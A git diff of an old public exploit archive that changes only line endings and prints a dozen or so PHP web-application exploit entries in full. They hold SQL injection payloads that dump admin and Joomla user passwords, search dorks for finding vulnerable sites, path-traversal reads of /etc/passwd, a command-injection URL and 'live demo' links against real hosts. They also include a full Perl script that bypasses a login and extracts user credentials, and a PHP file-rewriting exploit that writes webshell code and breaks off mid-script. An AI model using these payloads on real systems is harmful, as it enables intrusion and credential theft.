-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-09]
+|___________________________________________________|
+|
+| Arad Center  (news.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                     |
+|
+| script : http://www.iranmc.com/shop.php
+|
+| DorK   : "Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/news.php?id=-1+union+select+0,0,concat(user,0x3e,pass),4+from+user--
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6713.txt b/platforms/php/webapps/6713.txt
index d6b29d04b..bab7f441d 100755
--- a/platforms/php/webapps/6713.txt
+++ b/platforms/php/webapps/6713.txt
@@ -1,28 +1,28 @@
-# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability
-# url: http://www.scriptsez.net/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-vuln file: members.php
-
-PoC:             /members.php?act=view&p=[FILE]&dir=[DIR]
-Exploits: 
-/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
-conf.php     --> /members.php?act=view&p=conf.php&dir=/test/../../..
-
-live demo:
-http://hosting.cgixp.apkafuture.com/index.php?action=login
-demo:demo (user login)
-
-http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
-http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../..
-
-Ingenious work :D
-
-# milw0rm.com [2008-10-09]
+# ScriptsEz Mini Hosting Panel (members.php) Local File Inclusion Vulnerability
+# url: http://www.scriptsez.net/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+vuln file: members.php
+
+PoC:             /members.php?act=view&p=[FILE]&dir=[DIR]
+Exploits: 
+/etc/passwd/ --> /members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
+conf.php     --> /members.php?act=view&p=conf.php&dir=/test/../../..
+
+live demo:
+http://hosting.cgixp.apkafuture.com/index.php?action=login
+demo:demo (user login)
+
+http://hosting.cgixp.apkafuture.com/members.php?act=view&p=passwd&dir=../../../../../../../../../../../../etc/
+http://hosting.cgixp.apkafuture.com/members.php?act=view&p=conf.php&dir=/test/../../..
+
+Ingenious work :D
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6714.pl b/platforms/php/webapps/6714.pl
index a070a8b80..1280a88b0 100755
--- a/platforms/php/webapps/6714.pl
+++ b/platforms/php/webapps/6714.pl
@@ -1,113 +1,113 @@
-#!/usr/bin/perl -w
-#
-# User credentials disclosure exploit - stash103exp.pl
-#
-# Gnix 
-# http://gnix.netsons.org
-# 
-# This exploit use an SQL Injection in the file admin/login.php to 
-# bypass the login, and then an SQL Injection in the admin/news.php 
-# to extract all the users info. Note: password are crypted with md5.
-#
-# Output for each user:
-# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin
-#
-
-use strict;
-use LWP::UserAgent;
-use HTTP::Request;
-use HTTP::Response;
-use HTTP::Cookies;
-
-
-# Variables
-my $cjar  = new HTTP::Cookies( file => 'cookies.txt', 
-                               autosave => 1, 
-                               ignore_discard => 0);
-my $agent = new LWP::UserAgent;
-$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM');
-  
-
-# Check argv
-if(@ARGV != 3) {
-  print "[?] Usage  : perl stash103exp.pl   \n";
-  print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n";
-  exit(1); 
-}
-
-
-# Authentication
-if(!auth($ARGV[0],$ARGV[1])) {
-  print "[!] Error during the authentication!\n";
-  exit(1);
-}
-
-
-# Extract all the user information
-my $info = extract_data($ARGV[0],$ARGV[2]);
-if(!$info) {
-  print "[!] Error when extracting data!\n";
-  exit(1);
-}
-
-
-# Print user information
-$_ = $info;
-my @users = m/<1>(.+?)<2>/g;
-foreach my $user (@users) {
-  print $user."\n";
-}
-
-
-exit(0);
-
-###########################################################################
-
-
-
-# Login as $ARGV[1] and save the PHPSESSID cookie
-sub auth
-{
-  my $address = shift;
-  my $username= shift;
-
-  # Login
-  my $response= $agent->post($address.'admin/login.php', 
-                             {username   => "' OR user_username = '$username", 
-                              password   => "any",
-                              submit    => "Log in"});
-
-  # Save PHPSESSID cookie
-  $cjar->extract_cookies($response);
-
-  return $response->is_redirect();
-}
-
-
-
-# Inject a query through news.php to extract all the info about every user
-sub extract_data
-{
-  my $address  = shift;
-  my $prefix  = shift;
-
-  my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title,  ".
-   "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,".
-  "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,".
-  "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0  ".
-  "AS news_comment FROM ".$prefix."news, ".$prefix."user";
-
-  my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query);
-
-  $agent->cookie_jar($cjar);
-  my $response= $agent->request($request);
-
-  if($response->is_success()) {
-    return $response->content();
-  }
-  else {
-    return undef;
-  }
-}
-
-# milw0rm.com [2008-10-09]
+#!/usr/bin/perl -w
+#
+# User credentials disclosure exploit - stash103exp.pl
+#
+# Gnix 
+# http://gnix.netsons.org
+# 
+# This exploit use an SQL Injection in the file admin/login.php to 
+# bypass the login, and then an SQL Injection in the admin/news.php 
+# to extract all the users info. Note: password are crypted with md5.
+#
+# Output for each user:
+# user_id:user_username:user_password:user_key:user_firstname user_lastname:user_email:user_admin
+#
+
+use strict;
+use LWP::UserAgent;
+use HTTP::Request;
+use HTTP::Response;
+use HTTP::Cookies;
+
+
+# Variables
+my $cjar  = new HTTP::Cookies( file => 'cookies.txt', 
+                               autosave => 1, 
+                               ignore_discard => 0);
+my $agent = new LWP::UserAgent;
+$agent->agent('Lynxy/6.6.6dev.8 libwww-FM/3.14159FM');
+  
+
+# Check argv
+if(@ARGV != 3) {
+  print "[?] Usage  : perl stash103exp.pl   \n";
+  print "[?] Example: perl stash103exp.pl http://site/stash/ avril st_\n";
+  exit(1); 
+}
+
+
+# Authentication
+if(!auth($ARGV[0],$ARGV[1])) {
+  print "[!] Error during the authentication!\n";
+  exit(1);
+}
+
+
+# Extract all the user information
+my $info = extract_data($ARGV[0],$ARGV[2]);
+if(!$info) {
+  print "[!] Error when extracting data!\n";
+  exit(1);
+}
+
+
+# Print user information
+$_ = $info;
+my @users = m/<1>(.+?)<2>/g;
+foreach my $user (@users) {
+  print $user."\n";
+}
+
+
+exit(0);
+
+###########################################################################
+
+
+
+# Login as $ARGV[1] and save the PHPSESSID cookie
+sub auth
+{
+  my $address = shift;
+  my $username= shift;
+
+  # Login
+  my $response= $agent->post($address.'admin/login.php', 
+                             {username   => "' OR user_username = '$username", 
+                              password   => "any",
+                              submit    => "Log in"});
+
+  # Save PHPSESSID cookie
+  $cjar->extract_cookies($response);
+
+  return $response->is_redirect();
+}
+
+
+
+# Inject a query through news.php to extract all the info about every user
+sub extract_data
+{
+  my $address  = shift;
+  my $prefix  = shift;
+
+  my $query = "-1 UNION SELECT 1 AS news_id, 'Injection' AS news_title,  ".
+   "CONCAT('<1>',user_id,':',user_username,':',user_password,':',user_key,".
+  "':',user_firstname,' ', user_lastname,':', user_email,':', user_admin,".
+  "'<2>') AS news_body, 'Mitnick' AS news_author, NOW() AS news_date, 0  ".
+  "AS news_comment FROM ".$prefix."news, ".$prefix."user";
+
+  my $request = new HTTP::Request('GET', $address.'admin/news.php?post='.$query);
+
+  $agent->cookie_jar($cjar);
+  my $response= $agent->request($request);
+
+  if($response->is_success()) {
+    return $response->content();
+  }
+  else {
+    return undef;
+  }
+}
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6715.txt b/platforms/php/webapps/6715.txt
index fc340bc85..dd0c13c3d 100755
--- a/platforms/php/webapps/6715.txt
+++ b/platforms/php/webapps/6715.txt
@@ -1,18 +1,18 @@
-# ScriptsEz Easy Image Downloader Local File Download Vulnerability
-# url: http://www.scriptsez.net/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-PoC:     /main.php?action=download&id=[FILE]
-Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd
-
-live demo:
-http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd
-
-# milw0rm.com [2008-10-09]
+# ScriptsEz Easy Image Downloader Local File Download Vulnerability
+# url: http://www.scriptsez.net/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+PoC:     /main.php?action=download&id=[FILE]
+Exploit: /main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd
+
+live demo:
+http://demo.scriptsez.net/easy_image/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6721.txt b/platforms/php/webapps/6721.txt
index 7d385fa8f..a5c55f407 100755
--- a/platforms/php/webapps/6721.txt
+++ b/platforms/php/webapps/6721.txt
@@ -1,21 +1,21 @@
-############### >>> Remote SQL Injection <<<  #########
-##    SuB-ZeRo  CoNsTaTiNe HaCkErS25 walid          ##
-################## >>> SuB-ZeRo  <<< ################
- author  :  SuB-ZeRo
- contact :  FbH@hotmail.com
-                
- scrit: forumhost
- buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host
- dork       : find it
- exploit:
- www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
- NoTe:in name of demo put eny user you want
- L!Ve DeMo
- http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
- NoTe:YoU must singup and login in web sit and you put your exploit
-########### Greetz #############
->>> SuB-ZeRo
->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 & bibi-info & crazy-zero
->>> all muslims
-
-# milw0rm.com [2008-10-10]
+############### >>> Remote SQL Injection <<<  #########
+##    SuB-ZeRo  CoNsTaTiNe HaCkErS25 walid          ##
+################## >>> SuB-ZeRo  <<< ################
+ author  :  SuB-ZeRo
+ contact :  FbH@hotmail.com
+                
+ scrit: forumhost
+ buy script : http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host
+ dork       : find it
+ exploit:
+ www.site.me/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
+ NoTe:in name of demo put eny user you want
+ L!Ve DeMo
+ http://www.easynet4u.com/forumhost/forum.php?user=demo&forum=-7+union+select+1,concat(username,0x3a,password),3,4+from+admin--
+ NoTe:YoU must singup and login in web sit and you put your exploit
+########### Greetz #############
+>>> SuB-ZeRo
+>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 & bibi-info & crazy-zero
+>>> all muslims
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6722.txt b/platforms/php/webapps/6722.txt
index 3a1b065bd..d005f3369 100755
--- a/platforms/php/webapps/6722.txt
+++ b/platforms/php/webapps/6722.txt
@@ -1,26 +1,26 @@
- ####   #    # ######               ##########
-#       #    # #    #               #        #
- ####   #    # #    #   #########   #        # 
-     #  #    # #####    #########   #        #
-#    #  #    # #    ##              ##########
- ####   ###### #######
-############### >>> Remote SQL Injection <<<  #########
-##    CoNsTaNtiNe HaCkErS25                         ##
-################## >>> SuB-ZeRo  <<< ################
- author  :  SuB-ZeRo(AlGeRiA-HaCkErS)
- contact :  FbH@hotmail.com
- homepage:  www.no-exploit.com               
- script  : faq_host script
- download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
- dork    : find it
- exploit:
- www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
- L!Ve DeMo
- http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
-
-########### Greetz #############
->>> SuB-ZeRo
->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4
->>> all muslims
-
-# milw0rm.com [2008-10-10]
+ ####   #    # ######               ##########
+#       #    # #    #               #        #
+ ####   #    # #    #   #########   #        # 
+     #  #    # #####    #########   #        #
+#    #  #    # #    ##              ##########
+ ####   ###### #######
+############### >>> Remote SQL Injection <<<  #########
+##    CoNsTaNtiNe HaCkErS25                         ##
+################## >>> SuB-ZeRo  <<< ################
+ author  :  SuB-ZeRo(AlGeRiA-HaCkErS)
+ contact :  FbH@hotmail.com
+ homepage:  www.no-exploit.com               
+ script  : faq_host script
+ download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
+ dork    : find it
+ exploit:
+ www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
+ L!Ve DeMo
+ http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
+
+########### Greetz #############
+>>> SuB-ZeRo
+>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4
+>>> all muslims
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6723.txt b/platforms/php/webapps/6723.txt
index 43683b10c..58ab23c6f 100755
--- a/platforms/php/webapps/6723.txt
+++ b/platforms/php/webapps/6723.txt
@@ -1,41 +1,41 @@
-#############################################################################
-#							                    #
-#        Joomla Component Ignite Gallery SQL Injection Vulnerability        #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Ignite Gallery (com_ignitegallery)"
-[~] Version:       "0.8.3" 
-[~] Author:        "Matt Thomson"
-[~] Author E-mail: "matt@ignitejoomlaextensions.com"
-[~] Author URL:    "www.ignitejoomlaextensions.com"
-
-########################################
-
-[~] DORK: inurl:"com_ignitegallery"
-
-########################################
-
-[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
-[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-10]
+#############################################################################
+#							                    #
+#        Joomla Component Ignite Gallery SQL Injection Vulnerability        #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Ignite Gallery (com_ignitegallery)"
+[~] Version:       "0.8.3" 
+[~] Author:        "Matt Thomson"
+[~] Author E-mail: "matt@ignitejoomlaextensions.com"
+[~] Author URL:    "www.ignitejoomlaextensions.com"
+
+########################################
+
+[~] DORK: inurl:"com_ignitegallery"
+
+########################################
+
+[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
+[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6724.txt b/platforms/php/webapps/6724.txt
index 58c4957a4..0870eacea 100755
--- a/platforms/php/webapps/6724.txt
+++ b/platforms/php/webapps/6724.txt
@@ -1,39 +1,39 @@
-#############################################################################
-#							                    #
-#     Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability     #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Mad4Joomla Mailforms (com_mad4joomla)" 
-[~] Author:        "Dipl. Inf. Fahrettin Kutyol"
-[~] Author E-mail: "joomla@mad4media.com"
-[~] Author URL:    "www.mad4media.de"
-
-########################################
-
-[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL]
-
-[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users--
-
-
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-10]
+#############################################################################
+#							                    #
+#     Joomla Component Mad4Joomla Mailforms SQL Injection Vulnerability     #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Mad4Joomla Mailforms (com_mad4joomla)" 
+[~] Author:        "Dipl. Inf. Fahrettin Kutyol"
+[~] Author E-mail: "joomla@mad4media.com"
+[~] Author URL:    "www.mad4media.de"
+
+########################################
+
+[~] Exploit: /index.php?option=com_mad4joomla&jid=[SQL]
+
+[~] Example: /index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users--
+
+
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6728.txt b/platforms/php/webapps/6728.txt
index 260a249cb..db9757ca7 100755
--- a/platforms/php/webapps/6728.txt
+++ b/platforms/php/webapps/6728.txt
@@ -1,25 +1,25 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
-#
-# Script : Easynet4u Link Host
-# Script Site: http://www.easynet4u.com/linkdem.php
-# 
-# SQL Injection Vuln. :
-# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
-#
-# Example:
-# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
-#
-# -------------------------------
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
-#                       Proud 2 Be MUSLIM !
-#                      Proud 2 Be ALBANIAN !
-#
-# Bunuda yayinlamassn ebeni ...
-#######################################################
-
-# milw0rm.com [2008-10-10]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
+#
+# Script : Easynet4u Link Host
+# Script Site: http://www.easynet4u.com/linkdem.php
+# 
+# SQL Injection Vuln. :
+# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
+#
+# Example:
+# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
+#
+# -------------------------------
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                       Proud 2 Be MUSLIM !
+#                      Proud 2 Be ALBANIAN !
+#
+# Bunuda yayinlamassn ebeni ...
+#######################################################
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6729.php b/platforms/php/webapps/6729.php
index 947344296..005e270f7 100755
--- a/platforms/php/webapps/6729.php
+++ b/platforms/php/webapps/6729.php
@@ -1,61 +1,61 @@
-#!/usr/bin/php -q
-
-
-# milw0rm.com [2008-10-10]
+#!/usr/bin/php -q
+
+
+# milw0rm.com [2008-10-10]
diff --git a/platforms/php/webapps/6730.txt b/platforms/php/webapps/6730.txt
index 745eed4df..6d24bb07e 100755
--- a/platforms/php/webapps/6730.txt
+++ b/platforms/php/webapps/6730.txt
@@ -1,39 +1,39 @@
-#############################################################################
-#							                    #
-#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Ownbiblio (com_ownbiblio)"
-[~] Version:       "1.5.3" 
-[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"
-
-########################################
-
-[~] DORK: inurl:"com_ownbiblio" catalogue
-
-########################################
-
-[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
-[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-11]
+#############################################################################
+#							                    #
+#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Ownbiblio (com_ownbiblio)"
+[~] Version:       "1.5.3" 
+[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"
+
+########################################
+
+[~] DORK: inurl:"com_ownbiblio" catalogue
+
+########################################
+
+[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
+[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-11]
diff --git a/platforms/php/webapps/6733.txt b/platforms/php/webapps/6733.txt
index 7213168d8..c3bf84ea9 100755
--- a/platforms/php/webapps/6733.txt
+++ b/platforms/php/webapps/6733.txt
@@ -1,18 +1,18 @@
-mini-pub 0.3 multiple vulnerabilities
-
-download   http://sourceforge.net/projects/mini-pub/
-
-author     muuratsalo
-contact    muuratsalo[at]gmail.com
-
-exploits
-1. local file disclosure
-http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
-
-2. local file disclosure
-http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
-
-3. command execution
-http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
-
-# milw0rm.com [2008-10-12]
+mini-pub 0.3 multiple vulnerabilities
+
+download   http://sourceforge.net/projects/mini-pub/
+
+author     muuratsalo
+contact    muuratsalo[at]gmail.com
+
+exploits
+1. local file disclosure
+http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
+
+2. local file disclosure
+http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
+
+3. command execution
+http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6734.txt b/platforms/php/webapps/6734.txt
index a904d6381..4c3c9b037 100755
--- a/platforms/php/webapps/6734.txt
+++ b/platforms/php/webapps/6734.txt
@@ -1,22 +1,22 @@
- _____   ____   __   __     _       ____        ____    ____ 
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-                                                            
-
-mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities
-Script : http://mini-pub.sourceforge.net/
-I- Local Directory Traversal
-POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL
-
-II- File Disclosure 
-POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php
-        ____           _           _           __  __ 
-       / ___|   ___   | |       __| |         |  \/  |
-      | |  _   / _ \  | |      / _` |         | |\/| |
-      | |_| | | (_) | | |___  | (_| |         | |  | |
-       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
-                                      |_____|         
-
-# milw0rm.com [2008-10-12]
+ _____   ____   __   __     _       ____        ____    ____ 
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+                                                            
+
+mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities
+Script : http://mini-pub.sourceforge.net/
+I- Local Directory Traversal
+POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL
+
+II- File Disclosure 
+POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php
+        ____           _           _           __  __ 
+       / ___|   ___   | |       __| |         |  \/  |
+      | |  _   / _ \  | |      / _` |         | |\/| |
+      | |_| | | (_) | | |___  | (_| |         | |  | |
+       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
+                                      |_____|         
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/php/webapps/6735.php b/platforms/php/webapps/6735.php
index d0b27dd43..817a0d284 100755
--- a/platforms/php/webapps/6735.php
+++ b/platforms/php/webapps/6735.php
@@ -1,102 +1,102 @@
-#!/usr/bin/php -q
-'".$filename."' could not be opened.");
-39. fwrite($handle, $data) or die("Write: The file '".$filename."' could not be writen.");    
-   
-   $mode is $_POST['mode'] and $data = $_POST['data']
-   
-   so you can rewrite (or create) any file 
-    
-*/
-
-
-error_reporting(0);
-ini_set("default_socket_timeout",5);
-
-$host = str_replace('http:\/\/',null,$argv[1]);
-$path = $argv[2]."/globsy_edit.php?file=";
-$file = $argv[3];
-$exec = intval($argv[4]);
-
-if($exec == 8)
-{
-  $input = stripslashes(trim(fgets(STDIN)));
-}
-else
-{
-  $input = "Write your code\r\n";
-}
-
-
-$array = array(
-               'include($_GET["input"]);',
-               'exec($_GET["input");',
-               'eval($_GET["input");',
-               'file_get_contents($_GET["input"]);',
-               'phpinfo();',
-               'system($_GET["input");',
-               'shell_exec($_GET["input");',
-               'echo $_GET["input");',
-                $input
-              );
-
-if($argc != 5)
-{
-  echo "[?] Globsy <= 1.0 Remote File Rewriting Exploit\r\n";
-  echo "[?] Usage: php $argv[0] [host] [path] [file] [option]\r\n\r\n";
-  echo "[?] Options: \r\n";
- 
-  for($i=0;$i<=count($array)-1;$i++)
-  {
-    echo "-$i $array[$i]\r\n";
-  }  
-    return exit;
-} 
-
-if(!$sock = fsockopen($host,80)) die("[?] Socket Error\r\n");
-
-$path .= $file;
-$post .= "mode=save&data=";
-$data .= "POST /$path HTTP/1.1\r\n";
-$data .= "Host: $host\r\n";
-$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
-$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$data .= "Accept-Encoding: text/plain\r\n";
-$data .= "Content-Length: ".strlen($post)."\r\n";
